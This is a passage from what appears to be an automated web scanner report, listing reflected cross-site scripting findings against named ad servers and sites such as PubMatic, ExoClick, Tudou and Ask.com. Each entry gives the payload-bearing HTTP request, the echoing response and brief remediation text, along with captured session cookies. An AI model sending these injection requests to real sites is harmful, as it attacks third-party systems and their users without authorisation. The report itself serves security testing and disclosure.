jsonp131343402923870c67<script>alert(1)</script>5505425b56e([{"hash":"768212f4d9c05b6c047059f0d80d78e0","facebook":68,"comments":45},{"hash":"768212f4d9c05b6c047059f0d80d78e0","facebook":68,"comments":45},{"hash":"fa1930d5d87d06aeb18a1b0d2bc36ea2","facebook":4
...[SNIP]...

1.47. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa829'-alert(1)-'9126a56ebc was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281fa829'-alert(1)-'9126a56ebc&kltstamp=2011-7-15%2013%3A42%3A18&ranreq=0.9575279243290424&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; pubtime_25281=TMC; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699; PUBMDCID=1; _curtime=1313432705; PMDTSHR=cat:; KTPCACOOKIE=YES; pubfreq_25281=243-1; pubfreq_28134=243-1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 15 Aug 2011 18:41:34 GMT
Content-Length: 1672
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:41:34 GMT; path=/
Set-Cookie: _curtime=1313433694; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:51:34 GMT; path=/
Set-Cookie: pubfreq_25281_19972_1470462086=243-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:21:34 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:41:34 GMT; path=/

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281fa829'-alert(1)-'9126a56ebc" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAMFiAAAETgAAwAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAxMjVBQkE5RC0wRkUyLTQ
...[SNIP]...

1.48. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b47b'-alert(1)-'7cb674115cb was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html2b47b'-alert(1)-'7cb674115cb&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281&kltstamp=2011-7-15%2013%3A25%3A48&ranreq=0.6436679325997829&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; PUBMDCID=1; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; PMDTSHR=cat:; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 15 Aug 2011 18:26:12 GMT
Content-Length: 1848
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:26:12 GMT; path=/
Set-Cookie: _curtime=1313432772; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:36:12 GMT; path=/
Set-Cookie: pubfreq_25281_19972_662613790=243-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:06:12 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:26:12 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...
width=728&kadheight=90&kltstamp=1313432772&indirectAdId=0&adServerOptimizerId=2&ranreq=0.6436679325997829&campaignId=1336&creativeId=0&pctr=0.000000&imprCap=1&pageURL=http://bpx.a9.com/amzn/iframe.html2b47b'-alert(1)-'7cb674115cb">
...[SNIP]...

1.49. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a87a1'-alert(1)-'8cf6d220125 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281&kltstamp=2011-7-15%2013%3A25%3A48&ranreq=0.6436679325997829a87a1'-alert(1)-'8cf6d220125&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; PUBMDCID=1; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; PMDTSHR=cat:; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1751
Date: Mon, 15 Aug 2011 18:26:12 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:26:12 GMT; path=/
Set-Cookie: pubfreq_25281_19972_992644624=661-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:06:12 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:26:12 GMT; path=/

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAMFiAAAET
...[SNIP]...
eId=25281&adId=19972&adServerId=661&kefact=0.934960&kpbmtpfact=0.000000&kadNetFrequecy=1&kadwidth=728&kadheight=90&kltstamp=1313432772&indirectAdId=24815&adServerOptimizerId=1&ranreq=0.6436679325997829a87a1'-alert(1)-'8cf6d220125&imprCap=1&pageURL=http://bpx.a9.com/amzn/iframe.html">
...[SNIP]...

1.50. http://syndication.exoclick.com/ads-iframe-display.php [bgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndication.exoclick.com
Path:   /ads-iframe-display.php

Issue detail

The value of the bgcolor request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99dcf"><script>alert(1)</script>91fc3346e8c was submitted in the bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads-iframe-display.php?type=945x100&login=xhamster&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF99dcf"><script>alert(1)</script>91fc3346e8c&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=&text_only=0&show_thumb=&idzone=147655&idsite=34954&p=http://www.xhamster.com&dt=1313434612256 HTTP/1.1
Host: syndication.exoclick.com
Proxy-Connection: keep-alive
Referer: http://custom.exoclick.com/xhamster-945x100.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 15 Aug 2011 18:56:06 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 328

<html>
<body style="margin: 0px; background-color: #FFFFFF99dcf"><script>alert(1)</script>91fc3346e8c; font-family: Verdana, Arial;">
<body style="margin: 0px;">
<iframe src="http://ifa.xhamstercams
...[SNIP]...

1.51. http://syndication.exoclick.com/ads-iframe-display.php [font parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndication.exoclick.com
Path:   /ads-iframe-display.php

Issue detail

The value of the font request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0612"><script>alert(1)</script>65a7bd969c5 was submitted in the font parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads-iframe-display.php?type=945x100&login=xhamster&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=b0612"><script>alert(1)</script>65a7bd969c5&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=&text_only=0&show_thumb=&idzone=147655&idsite=34954&p=http://www.xhamster.com&dt=1313434612256 HTTP/1.1
Host: syndication.exoclick.com
Proxy-Connection: keep-alive
Referer: http://custom.exoclick.com/xhamster-945x100.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 15 Aug 2011 18:56:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 314

<html>
<body style="margin: 0px; background-color: #FFFFFF; font-family: b0612"><script>alert(1)</script>65a7bd969c5;">
<body style="margin: 0px;">
<iframe src="http://ifa.xhamstercams.com/dif/?cid=
...[SNIP]...

1.52. http://v2.tudou.com/tdct/commonadv.html [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://v2.tudou.com
Path:   /tdct/commonadv.html

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 155d9<script>alert(1)</script>13fff8eccf4 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tdct/commonadv.html?date=8-15-13&jsoncallback=adExtension.callback155d9<script>alert(1)</script>13fff8eccf4&areaCode=0&positionId=4101 HTTP/1.1
Host: v2.tudou.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: juid=bl9jp2sf91i; pageStep=2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0
Vary: Accept-Encoding
Content-Type: text/html;charset=GBK
Date: Mon, 15 Aug 2011 18:58:51 GMT
X-Cache: MISS from adextensioncontrol.tudou.com
Content-Length: 77552

adExtension.callback155d9<script>alert(1)</script>13fff8eccf4({"mulSel":[],"commonAdvReturnEntityList":[{"textContent":"","isMulSel":0,"seedFlashTitle":"","ownerId":"100203","thirdPartClick":"","specialTime":0,"mustShowFlag":0,"videoList":[{"duration":"1:09","re
...[SNIP]...

1.53. http://www.ask.com/news [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d629</script><script>alert(1)</script>5e777743ea1 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss8d629</script><script>alert(1)</script>5e777743ea1 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQXMAADyFgG0AAAA1
from-tr: trafrt005iad.io.askjeeves.info
Content-Length: 64756
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-news1&ch=&ty=image%2Cflash&size=300x250&kw=xss8d629</script><script>alert(1)</script>5e777743ea1&hints=xss8d629</script>
...[SNIP]...

1.54. http://www.ask.com/news [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a56d"><script>alert(1)</script>6a435691c6e was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news?o=0&l=dir&qsrc=168&q=6a56d"><script>alert(1)</script>6a435691c6e HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllLQpcQKQAAHD@VTYAAAIK
from-tr: trafrt012iad.io.askjeeves.info
Content-Length: 64591
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:58 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjU3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:57 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-news1&ch=&ty=image%2Cflash&size=300x250&kw=6a56d"><script>alert(1)</script>6a435691c6e&hints=6a56d">
...[SNIP]...

1.55. http://www.ask.com/pictures [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8935d"><script>alert(1)</script>72fe6858d8c was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=8935d"><script>alert(1)</script>72fe6858d8c&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllIwpcQXMAADyFdcUAAABi
from-tr: trafrt005iad.io.askjeeves.info
Content-Length: 67992
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:48 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjQ3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:47 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-special&ch=&ty=image%2Cflash&size=300x250&kw=8935d"><script>alert(1)</script>72fe6858d8c&hints=8935d">
...[SNIP]...

1.56. http://www.ask.com/pictures [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40b5e</script><script>alert(1)</script>b21e6c4ebb7 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss40b5e</script><script>alert(1)</script>b21e6c4ebb7&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
